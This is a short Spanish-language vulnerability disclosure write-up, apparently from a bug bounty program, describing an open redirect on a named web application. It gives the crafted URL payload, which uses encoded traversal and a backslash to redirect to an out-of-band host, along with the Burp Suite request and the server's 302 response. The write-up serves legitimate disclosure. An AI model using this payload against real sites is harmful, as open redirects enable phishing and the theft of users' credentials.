VDP Hagalink
| Plataforma | VDP Program en Grayback |
|---|---|
| Dificultad | 🟡 Medio |
| Sistema operativo | 🌐 Web |
| Estado | Terminada |
| Técnicas | #web#openredirect#vdp#bugbounty#burpsuite |
| Extensión | 72 palabras · 1 min |
| Máquina original | https://hagalink.es |
1
PASOS PARA REPRODUCIR
Navegar a timedashboard.hagalink.es
Manipular URL de la siguiente manera: https://timedashboard.hagalink.es/public/..%2F%5coast.pro%2F%3f%2F..%2F..
Si miramos en la petición nos devuelve 302 Found Location: /\oast.pro/?/../../ y Found. Logramos hacer que el servidor procese nuestro código inyectado en la URL
PRUEBA DE CONCEPTO
He usado burpsuite. Petición inicial:
GET /public/..%2F%5coast.pro%2F%3f%2F..%2F.. HTTP/2 Host: timedashboard.hagalink.es
Respuesta por parte del servidor:
302 OK Location: /\oast.pro/?/../../ Found
Muy sencillo de realizar y comprobamos la vulnerabilidad de esta manera.
